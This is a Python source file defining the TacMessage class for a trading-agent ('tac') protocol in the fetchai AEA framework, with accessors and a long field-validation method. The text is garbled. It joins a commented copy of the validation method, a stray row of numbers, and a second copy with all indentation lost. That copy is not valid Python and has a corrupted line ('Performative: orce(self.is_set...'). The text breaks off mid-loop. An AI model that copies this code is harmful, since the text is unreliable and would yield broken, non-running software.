enforce(self.is_set("version_id"), "'version_id' content is not set.")
return cast(str, self.get("version_id"))
    def _is_consistent(self) -> bool:
        """
        Check that the message follows the tac protocol.

        Validates, in order: the types of the header fields
        (dialogue_reference, message_id, target), the performative, the types
        of every content required by that performative (including dictionary
        key/value types), the total number of contents, and the Light Protocol
        target rule. Any violation raises inside the try block and is caught,
        logged, and reported by returning False instead of propagating.

        :return: True if the message is consistent, False otherwise.
        """
        try:
            # Light Protocol Rule 1
            # Check correct types for the default (header) fields.
            enforce(
                type(self.dialogue_reference) == tuple,
                "Invalid type for 'dialogue_reference'. Expected 'tuple'. Found '{}'.".format(
                    type(self.dialogue_reference)
                ),
            )
            enforce(
                type(self.dialogue_reference[0]) == str,
                "Invalid type for 'dialogue_reference[0]'. Expected 'str'. Found '{}'.".format(
                    type(self.dialogue_reference[0])
                ),
            )
            enforce(
                type(self.dialogue_reference[1]) == str,
                "Invalid type for 'dialogue_reference[1]'. Expected 'str'. Found '{}'.".format(
                    type(self.dialogue_reference[1])
                ),
            )
            enforce(
                type(self.message_id) == int,
                "Invalid type for 'message_id'. Expected 'int'. Found '{}'.".format(
                    type(self.message_id)
                ),
            )
            enforce(
                type(self.target) == int,
                "Invalid type for 'target'. Expected 'int'. Found '{}'.".format(
                    type(self.target)
                ),
            )
            # Light Protocol Rule 2
            # Check correct performative
            enforce(
                type(self.performative) == TacMessage.Performative,
                "Invalid 'performative'. Expected either of '{}'. Found '{}'.".format(
                    self.valid_performatives, self.performative
                ),
            )
            # Check correct contents
            # actual count excludes the DEFAULT_BODY_SIZE header entries.
            actual_nb_of_contents = len(self._body) - DEFAULT_BODY_SIZE
            expected_nb_of_contents = 0
            # REGISTER: only the registering agent's name is carried.
            if self.performative == TacMessage.Performative.REGISTER:
                expected_nb_of_contents = 1
                enforce(
                    type(self.agent_name) == str,
                    "Invalid type for content 'agent_name'. Expected 'str'. Found '{}'.".format(
                        type(self.agent_name)
                    ),
                )
            elif self.performative == TacMessage.Performative.UNREGISTER:
                expected_nb_of_contents = 0
            # TRANSACTION: the full doubly-signed transaction payload.
            elif self.performative == TacMessage.Performative.TRANSACTION:
                expected_nb_of_contents = 10
                enforce(
                    type(self.transaction_id) == str,
                    "Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
                        type(self.transaction_id)
                    ),
                )
                enforce(
                    type(self.ledger_id) == str,
                    "Invalid type for content 'ledger_id'. Expected 'str'. Found '{}'.".format(
                        type(self.ledger_id)
                    ),
                )
                enforce(
                    type(self.sender_address) == str,
                    "Invalid type for content 'sender_address'. Expected 'str'. Found '{}'.".format(
                        type(self.sender_address)
                    ),
                )
                enforce(
                    type(self.counterparty_address) == str,
                    "Invalid type for content 'counterparty_address'. Expected 'str'. Found '{}'.".format(
                        type(self.counterparty_address)
                    ),
                )
                enforce(
                    type(self.amount_by_currency_id) == dict,
                    "Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.amount_by_currency_id)
                    ),
                )
                for (
                    key_of_amount_by_currency_id,
                    value_of_amount_by_currency_id,
                ) in self.amount_by_currency_id.items():
                    enforce(
                        type(key_of_amount_by_currency_id) == str,
                        "Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_amount_by_currency_id)
                        ),
                    )
                    enforce(
                        type(value_of_amount_by_currency_id) == int,
                        "Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_amount_by_currency_id)
                        ),
                    )
                enforce(
                    type(self.fee_by_currency_id) == dict,
                    "Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.fee_by_currency_id)
                    ),
                )
                for (
                    key_of_fee_by_currency_id,
                    value_of_fee_by_currency_id,
                ) in self.fee_by_currency_id.items():
                    enforce(
                        type(key_of_fee_by_currency_id) == str,
                        "Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_fee_by_currency_id)
                        ),
                    )
                    enforce(
                        type(value_of_fee_by_currency_id) == int,
                        "Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_fee_by_currency_id)
                        ),
                    )
                enforce(
                    type(self.quantities_by_good_id) == dict,
                    "Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.quantities_by_good_id)
                    ),
                )
                for (
                    key_of_quantities_by_good_id,
                    value_of_quantities_by_good_id,
                ) in self.quantities_by_good_id.items():
                    enforce(
                        type(key_of_quantities_by_good_id) == str,
                        "Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_quantities_by_good_id)
                        ),
                    )
                    enforce(
                        type(value_of_quantities_by_good_id) == int,
                        "Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_quantities_by_good_id)
                        ),
                    )
                enforce(
                    type(self.nonce) == str,
                    "Invalid type for content 'nonce'. Expected 'str'. Found '{}'.".format(
                        type(self.nonce)
                    ),
                )
                enforce(
                    type(self.sender_signature) == str,
                    "Invalid type for content 'sender_signature'. Expected 'str'. Found '{}'.".format(
                        type(self.sender_signature)
                    ),
                )
                enforce(
                    type(self.counterparty_signature) == str,
                    "Invalid type for content 'counterparty_signature'. Expected 'str'. Found '{}'.".format(
                        type(self.counterparty_signature)
                    ),
                )
            elif self.performative == TacMessage.Performative.CANCELLED:
                expected_nb_of_contents = 0
            # GAME_DATA: the initial game state plus an optional 'info' dict.
            elif self.performative == TacMessage.Performative.GAME_DATA:
                expected_nb_of_contents = 9
                enforce(
                    type(self.amount_by_currency_id) == dict,
                    "Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.amount_by_currency_id)
                    ),
                )
                for (
                    key_of_amount_by_currency_id,
                    value_of_amount_by_currency_id,
                ) in self.amount_by_currency_id.items():
                    enforce(
                        type(key_of_amount_by_currency_id) == str,
                        "Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_amount_by_currency_id)
                        ),
                    )
                    enforce(
                        type(value_of_amount_by_currency_id) == int,
                        "Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_amount_by_currency_id)
                        ),
                    )
                enforce(
                    type(self.exchange_params_by_currency_id) == dict,
                    "Invalid type for content 'exchange_params_by_currency_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.exchange_params_by_currency_id)
                    ),
                )
                for (
                    key_of_exchange_params_by_currency_id,
                    value_of_exchange_params_by_currency_id,
                ) in self.exchange_params_by_currency_id.items():
                    enforce(
                        type(key_of_exchange_params_by_currency_id) == str,
                        "Invalid type for dictionary keys in content 'exchange_params_by_currency_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_exchange_params_by_currency_id)
                        ),
                    )
                    enforce(
                        type(value_of_exchange_params_by_currency_id) == float,
                        "Invalid type for dictionary values in content 'exchange_params_by_currency_id'. Expected 'float'. Found '{}'.".format(
                            type(value_of_exchange_params_by_currency_id)
                        ),
                    )
                enforce(
                    type(self.quantities_by_good_id) == dict,
                    "Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.quantities_by_good_id)
                    ),
                )
                for (
                    key_of_quantities_by_good_id,
                    value_of_quantities_by_good_id,
                ) in self.quantities_by_good_id.items():
                    enforce(
                        type(key_of_quantities_by_good_id) == str,
                        "Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_quantities_by_good_id)
                        ),
                    )
                    enforce(
                        type(value_of_quantities_by_good_id) == int,
                        "Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_quantities_by_good_id)
                        ),
                    )
                enforce(
                    type(self.utility_params_by_good_id) == dict,
                    "Invalid type for content 'utility_params_by_good_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.utility_params_by_good_id)
                    ),
                )
                for (
                    key_of_utility_params_by_good_id,
                    value_of_utility_params_by_good_id,
                ) in self.utility_params_by_good_id.items():
                    enforce(
                        type(key_of_utility_params_by_good_id) == str,
                        "Invalid type for dictionary keys in content 'utility_params_by_good_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_utility_params_by_good_id)
                        ),
                    )
                    enforce(
                        type(value_of_utility_params_by_good_id) == float,
                        "Invalid type for dictionary values in content 'utility_params_by_good_id'. Expected 'float'. Found '{}'.".format(
                            type(value_of_utility_params_by_good_id)
                        ),
                    )
                enforce(
                    type(self.fee_by_currency_id) == dict,
                    "Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.fee_by_currency_id)
                    ),
                )
                for (
                    key_of_fee_by_currency_id,
                    value_of_fee_by_currency_id,
                ) in self.fee_by_currency_id.items():
                    enforce(
                        type(key_of_fee_by_currency_id) == str,
                        "Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_fee_by_currency_id)
                        ),
                    )
                    enforce(
                        type(value_of_fee_by_currency_id) == int,
                        "Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_fee_by_currency_id)
                        ),
                    )
                enforce(
                    type(self.agent_addr_to_name) == dict,
                    "Invalid type for content 'agent_addr_to_name'. Expected 'dict'. Found '{}'.".format(
                        type(self.agent_addr_to_name)
                    ),
                )
                for (
                    key_of_agent_addr_to_name,
                    value_of_agent_addr_to_name,
                ) in self.agent_addr_to_name.items():
                    enforce(
                        type(key_of_agent_addr_to_name) == str,
                        "Invalid type for dictionary keys in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
                            type(key_of_agent_addr_to_name)
                        ),
                    )
                    enforce(
                        type(value_of_agent_addr_to_name) == str,
                        "Invalid type for dictionary values in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
                            type(value_of_agent_addr_to_name)
                        ),
                    )
                enforce(
                    type(self.currency_id_to_name) == dict,
                    "Invalid type for content 'currency_id_to_name'. Expected 'dict'. Found '{}'.".format(
                        type(self.currency_id_to_name)
                    ),
                )
                for (
                    key_of_currency_id_to_name,
                    value_of_currency_id_to_name,
                ) in self.currency_id_to_name.items():
                    enforce(
                        type(key_of_currency_id_to_name) == str,
                        "Invalid type for dictionary keys in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
                            type(key_of_currency_id_to_name)
                        ),
                    )
                    enforce(
                        type(value_of_currency_id_to_name) == str,
                        "Invalid type for dictionary values in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
                            type(value_of_currency_id_to_name)
                        ),
                    )
                enforce(
                    type(self.good_id_to_name) == dict,
                    "Invalid type for content 'good_id_to_name'. Expected 'dict'. Found '{}'.".format(
                        type(self.good_id_to_name)
                    ),
                )
                for (
                    key_of_good_id_to_name,
                    value_of_good_id_to_name,
                ) in self.good_id_to_name.items():
                    enforce(
                        type(key_of_good_id_to_name) == str,
                        "Invalid type for dictionary keys in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
                            type(key_of_good_id_to_name)
                        ),
                    )
                    enforce(
                        type(value_of_good_id_to_name) == str,
                        "Invalid type for dictionary values in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
                            type(value_of_good_id_to_name)
                        ),
                    )
                enforce(
                    type(self.version_id) == str,
                    "Invalid type for content 'version_id'. Expected 'str'. Found '{}'.".format(
                        type(self.version_id)
                    ),
                )
                # 'info' is optional: it adds to the expected count only when set.
                if self.is_set("info"):
                    expected_nb_of_contents += 1
                    info = cast(Dict[str, str], self.info)
                    enforce(
                        type(info) == dict,
                        "Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
                            type(info)
                        ),
                    )
                    for key_of_info, value_of_info in info.items():
                        enforce(
                            type(key_of_info) == str,
                            "Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
                                type(key_of_info)
                            ),
                        )
                        enforce(
                            type(value_of_info) == str,
                            "Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
                                type(value_of_info)
                            ),
                        )
            elif self.performative == TacMessage.Performative.TRANSACTION_CONFIRMATION:
                expected_nb_of_contents = 3
                enforce(
                    type(self.transaction_id) == str,
                    "Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
                        type(self.transaction_id)
                    ),
                )
                enforce(
                    type(self.amount_by_currency_id) == dict,
                    "Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.amount_by_currency_id)
                    ),
                )
                for (
                    key_of_amount_by_currency_id,
                    value_of_amount_by_currency_id,
                ) in self.amount_by_currency_id.items():
                    enforce(
                        type(key_of_amount_by_currency_id) == str,
                        "Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_amount_by_currency_id)
                        ),
                    )
                    enforce(
                        type(value_of_amount_by_currency_id) == int,
                        "Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_amount_by_currency_id)
                        ),
                    )
                enforce(
                    type(self.quantities_by_good_id) == dict,
                    "Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
                        type(self.quantities_by_good_id)
                    ),
                )
                for (
                    key_of_quantities_by_good_id,
                    value_of_quantities_by_good_id,
                ) in self.quantities_by_good_id.items():
                    enforce(
                        type(key_of_quantities_by_good_id) == str,
                        "Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
                            type(key_of_quantities_by_good_id)
                        ),
                    )
                    enforce(
                        type(value_of_quantities_by_good_id) == int,
                        "Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
                            type(value_of_quantities_by_good_id)
                        ),
                    )
            # TAC_ERROR: an error code plus an optional 'info' dict.
            elif self.performative == TacMessage.Performative.TAC_ERROR:
                expected_nb_of_contents = 1
                enforce(
                    type(self.error_code) == CustomErrorCode,
                    "Invalid type for content 'error_code'. Expected 'ErrorCode'. Found '{}'.".format(
                        type(self.error_code)
                    ),
                )
                if self.is_set("info"):
                    expected_nb_of_contents += 1
                    info = cast(Dict[str, str], self.info)
                    enforce(
                        type(info) == dict,
                        "Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
                            type(info)
                        ),
                    )
                    for key_of_info, value_of_info in info.items():
                        enforce(
                            type(key_of_info) == str,
                            "Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
                                type(key_of_info)
                            ),
                        )
                        enforce(
                            type(value_of_info) == str,
                            "Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
                                type(value_of_info)
                            ),
                        )
            # Check correct content count
            enforce(
                expected_nb_of_contents == actual_nb_of_contents,
                "Incorrect number of contents. Expected {}. Found {}".format(
                    expected_nb_of_contents, actual_nb_of_contents
                ),
            )
            # Light Protocol Rule 3
            if self.message_id == 1:
                enforce(
                    self.target == 0,
                    "Invalid 'target'. Expected 0 (because 'message_id' is 1). Found {}.".format(
                        self.target
                    ),
                )
        except (AEAEnforceError, ValueError, KeyError) as e:
            # A failed check means an inconsistent message, not a crash:
            # log the reason and report False to the caller.
            _default_logger.error(str(e))
            return False
        return True
| 44.150454 | 143 | 0.503613 |
import logging
from typing import Any, Dict, Optional, Set, Tuple, cast
from aea.configurations.base import PublicId
from aea.exceptions import AEAEnforceError, enforce
from aea.protocols.base import Message
from packages.fetchai.protocols.tac.custom_types import ErrorCode as CustomErrorCode
_default_logger = logging.getLogger("aea.packages.fetchai.protocols.tac.message")
DEFAULT_BODY_SIZE = 4
class TacMessage(Message):
protocol_id = PublicId.from_str("fetchai/tac:0.15.0")
protocol_specification_id = PublicId.from_str("fetchai/tac:1.0.0")
ErrorCode = CustomErrorCode
class Performative(Message.Performative):
CANCELLED = "cancelled"
GAME_DATA = "game_data"
REGISTER = "register"
TAC_ERROR = "tac_error"
TRANSACTION = "transaction"
TRANSACTION_CONFIRMATION = "transaction_confirmation"
UNREGISTER = "unregister"
def __str__(self) -> str:
return str(self.value)
_performatives = {
"cancelled",
"game_data",
"register",
"tac_error",
"transaction",
"transaction_confirmation",
"unregister",
}
__slots__: Tuple[str, ...] = tuple()
class _SlotsCls:
__slots__ = (
"agent_addr_to_name",
"agent_name",
"amount_by_currency_id",
"counterparty_address",
"counterparty_signature",
"currency_id_to_name",
"dialogue_reference",
"error_code",
"exchange_params_by_currency_id",
"fee_by_currency_id",
"good_id_to_name",
"info",
"ledger_id",
"message_id",
"nonce",
"performative",
"quantities_by_good_id",
"sender_address",
"sender_signature",
"target",
"transaction_id",
"utility_params_by_good_id",
"version_id",
)
def __init__(
self,
performative: Performative,
dialogue_reference: Tuple[str, str] = ("", ""),
message_id: int = 1,
target: int = 0,
**kwargs: Any,
):
super().__init__(
dialogue_reference=dialogue_reference,
message_id=message_id,
target=target,
performative=TacMessage.Performative(performative),
**kwargs,
)
@property
def valid_performatives(self) -> Set[str]:
return self._performatives
@property
def dialogue_reference(self) -> Tuple[str, str]:
enforce(self.is_set("dialogue_reference"), "dialogue_reference is not set.")
return cast(Tuple[str, str], self.get("dialogue_reference"))
@property
def message_id(self) -> int:
enforce(self.is_set("message_id"), "message_id is not set.")
return cast(int, self.get("message_id"))
@property
def performative(self) -> Performative: orce(self.is_set("performative"), "performative is not set.")
return cast(TacMessage.Performative, self.get("performative"))
@property
def target(self) -> int:
enforce(self.is_set("target"), "target is not set.")
return cast(int, self.get("target"))
@property
def agent_addr_to_name(self) -> Dict[str, str]:
enforce(
self.is_set("agent_addr_to_name"),
"'agent_addr_to_name' content is not set.",
)
return cast(Dict[str, str], self.get("agent_addr_to_name"))
@property
def agent_name(self) -> str:
enforce(self.is_set("agent_name"), "'agent_name' content is not set.")
return cast(str, self.get("agent_name"))
@property
def amount_by_currency_id(self) -> Dict[str, int]:
enforce(
self.is_set("amount_by_currency_id"),
"'amount_by_currency_id' content is not set.",
)
return cast(Dict[str, int], self.get("amount_by_currency_id"))
@property
def counterparty_address(self) -> str:
enforce(
self.is_set("counterparty_address"),
"'counterparty_address' content is not set.",
)
return cast(str, self.get("counterparty_address"))
@property
def counterparty_signature(self) -> str:
enforce(
self.is_set("counterparty_signature"),
"'counterparty_signature' content is not set.",
)
return cast(str, self.get("counterparty_signature"))
@property
def currency_id_to_name(self) -> Dict[str, str]:
enforce(
self.is_set("currency_id_to_name"),
"'currency_id_to_name' content is not set.",
)
return cast(Dict[str, str], self.get("currency_id_to_name"))
@property
def error_code(self) -> CustomErrorCode:
enforce(self.is_set("error_code"), "'error_code' content is not set.")
return cast(CustomErrorCode, self.get("error_code"))
@property
def exchange_params_by_currency_id(self) -> Dict[str, float]:
enforce(
self.is_set("exchange_params_by_currency_id"),
"'exchange_params_by_currency_id' content is not set.",
)
return cast(Dict[str, float], self.get("exchange_params_by_currency_id"))
@property
def fee_by_currency_id(self) -> Dict[str, int]:
enforce(
self.is_set("fee_by_currency_id"),
"'fee_by_currency_id' content is not set.",
)
return cast(Dict[str, int], self.get("fee_by_currency_id"))
@property
def good_id_to_name(self) -> Dict[str, str]:
enforce(self.is_set("good_id_to_name"), "'good_id_to_name' content is not set.")
return cast(Dict[str, str], self.get("good_id_to_name"))
@property
def info(self) -> Optional[Dict[str, str]]:
return cast(Optional[Dict[str, str]], self.get("info"))
@property
def ledger_id(self) -> str:
enforce(self.is_set("ledger_id"), "'ledger_id' content is not set.")
return cast(str, self.get("ledger_id"))
@property
def nonce(self) -> str:
enforce(self.is_set("nonce"), "'nonce' content is not set.")
return cast(str, self.get("nonce"))
@property
def quantities_by_good_id(self) -> Dict[str, int]:
enforce(
self.is_set("quantities_by_good_id"),
"'quantities_by_good_id' content is not set.",
)
return cast(Dict[str, int], self.get("quantities_by_good_id"))
@property
def sender_address(self) -> str:
enforce(self.is_set("sender_address"), "'sender_address' content is not set.")
return cast(str, self.get("sender_address"))
@property
def sender_signature(self) -> str:
enforce(
self.is_set("sender_signature"), "'sender_signature' content is not set."
)
return cast(str, self.get("sender_signature"))
@property
def transaction_id(self) -> str:
enforce(self.is_set("transaction_id"), "'transaction_id' content is not set.")
return cast(str, self.get("transaction_id"))
@property
def utility_params_by_good_id(self) -> Dict[str, float]:
enforce(
self.is_set("utility_params_by_good_id"),
"'utility_params_by_good_id' content is not set.",
)
return cast(Dict[str, float], self.get("utility_params_by_good_id"))
@property
def version_id(self) -> str:
enforce(self.is_set("version_id"), "'version_id' content is not set.")
return cast(str, self.get("version_id"))
def _is_consistent(self) -> bool:
try:
enforce(
type(self.dialogue_reference) == tuple,
"Invalid type for 'dialogue_reference'. Expected 'tuple'. Found '{}'.".format(
type(self.dialogue_reference)
),
)
enforce(
type(self.dialogue_reference[0]) == str,
"Invalid type for 'dialogue_reference[0]'. Expected 'str'. Found '{}'.".format(
type(self.dialogue_reference[0])
),
)
enforce(
type(self.dialogue_reference[1]) == str,
"Invalid type for 'dialogue_reference[1]'. Expected 'str'. Found '{}'.".format(
type(self.dialogue_reference[1])
),
)
enforce(
type(self.message_id) == int,
"Invalid type for 'message_id'. Expected 'int'. Found '{}'.".format(
type(self.message_id)
),
)
enforce(
type(self.target) == int,
"Invalid type for 'target'. Expected 'int'. Found '{}'.".format(
type(self.target)
),
)
enforce(
type(self.performative) == TacMessage.Performative,
"Invalid 'performative'. Expected either of '{}'. Found '{}'.".format(
self.valid_performatives, self.performative
),
)
actual_nb_of_contents = len(self._body) - DEFAULT_BODY_SIZE
expected_nb_of_contents = 0
if self.performative == TacMessage.Performative.REGISTER:
expected_nb_of_contents = 1
enforce(
type(self.agent_name) == str,
"Invalid type for content 'agent_name'. Expected 'str'. Found '{}'.".format(
type(self.agent_name)
),
)
elif self.performative == TacMessage.Performative.UNREGISTER:
expected_nb_of_contents = 0
elif self.performative == TacMessage.Performative.TRANSACTION:
expected_nb_of_contents = 10
enforce(
type(self.transaction_id) == str,
"Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
type(self.transaction_id)
),
)
enforce(
type(self.ledger_id) == str,
"Invalid type for content 'ledger_id'. Expected 'str'. Found '{}'.".format(
type(self.ledger_id)
),
)
enforce(
type(self.sender_address) == str,
"Invalid type for content 'sender_address'. Expected 'str'. Found '{}'.".format(
type(self.sender_address)
),
)
enforce(
type(self.counterparty_address) == str,
"Invalid type for content 'counterparty_address'. Expected 'str'. Found '{}'.".format(
type(self.counterparty_address)
),
)
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.fee_by_currency_id) == dict,
"Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.fee_by_currency_id)
),
)
for (
key_of_fee_by_currency_id,
value_of_fee_by_currency_id,
) in self.fee_by_currency_id.items():
enforce(
type(key_of_fee_by_currency_id) == str,
"Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_fee_by_currency_id)
),
)
enforce(
type(value_of_fee_by_currency_id) == int,
"Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_fee_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
enforce(
type(self.nonce) == str,
"Invalid type for content 'nonce'. Expected 'str'. Found '{}'.".format(
type(self.nonce)
),
)
enforce(
type(self.sender_signature) == str,
"Invalid type for content 'sender_signature'. Expected 'str'. Found '{}'.".format(
type(self.sender_signature)
),
)
enforce(
type(self.counterparty_signature) == str,
"Invalid type for content 'counterparty_signature'. Expected 'str'. Found '{}'.".format(
type(self.counterparty_signature)
),
)
elif self.performative == TacMessage.Performative.CANCELLED:
expected_nb_of_contents = 0
elif self.performative == TacMessage.Performative.GAME_DATA:
expected_nb_of_contents = 9
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.exchange_params_by_currency_id) == dict,
"Invalid type for content 'exchange_params_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.exchange_params_by_currency_id)
),
)
for (
key_of_exchange_params_by_currency_id,
value_of_exchange_params_by_currency_id,
) in self.exchange_params_by_currency_id.items():
enforce(
type(key_of_exchange_params_by_currency_id) == str,
"Invalid type for dictionary keys in content 'exchange_params_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_exchange_params_by_currency_id)
),
)
enforce(
type(value_of_exchange_params_by_currency_id) == float,
"Invalid type for dictionary values in content 'exchange_params_by_currency_id'. Expected 'float'. Found '{}'.".format(
type(value_of_exchange_params_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
enforce(
type(self.utility_params_by_good_id) == dict,
"Invalid type for content 'utility_params_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.utility_params_by_good_id)
),
)
for (
key_of_utility_params_by_good_id,
value_of_utility_params_by_good_id,
) in self.utility_params_by_good_id.items():
enforce(
type(key_of_utility_params_by_good_id) == str,
"Invalid type for dictionary keys in content 'utility_params_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_utility_params_by_good_id)
),
)
enforce(
type(value_of_utility_params_by_good_id) == float,
"Invalid type for dictionary values in content 'utility_params_by_good_id'. Expected 'float'. Found '{}'.".format(
type(value_of_utility_params_by_good_id)
),
)
enforce(
type(self.fee_by_currency_id) == dict,
"Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.fee_by_currency_id)
),
)
for (
key_of_fee_by_currency_id,
value_of_fee_by_currency_id,
) in self.fee_by_currency_id.items():
enforce(
type(key_of_fee_by_currency_id) == str,
"Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_fee_by_currency_id)
),
)
enforce(
type(value_of_fee_by_currency_id) == int,
"Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_fee_by_currency_id)
),
)
enforce(
type(self.agent_addr_to_name) == dict,
"Invalid type for content 'agent_addr_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.agent_addr_to_name)
),
)
for (
key_of_agent_addr_to_name,
value_of_agent_addr_to_name,
) in self.agent_addr_to_name.items():
enforce(
type(key_of_agent_addr_to_name) == str,
"Invalid type for dictionary keys in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_agent_addr_to_name)
),
)
enforce(
type(value_of_agent_addr_to_name) == str,
"Invalid type for dictionary values in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_agent_addr_to_name)
),
)
enforce(
type(self.currency_id_to_name) == dict,
"Invalid type for content 'currency_id_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.currency_id_to_name)
),
)
for (
key_of_currency_id_to_name,
value_of_currency_id_to_name,
) in self.currency_id_to_name.items():
enforce(
type(key_of_currency_id_to_name) == str,
"Invalid type for dictionary keys in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_currency_id_to_name)
),
)
enforce(
type(value_of_currency_id_to_name) == str,
"Invalid type for dictionary values in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_currency_id_to_name)
),
)
enforce(
type(self.good_id_to_name) == dict,
"Invalid type for content 'good_id_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.good_id_to_name)
),
)
for (
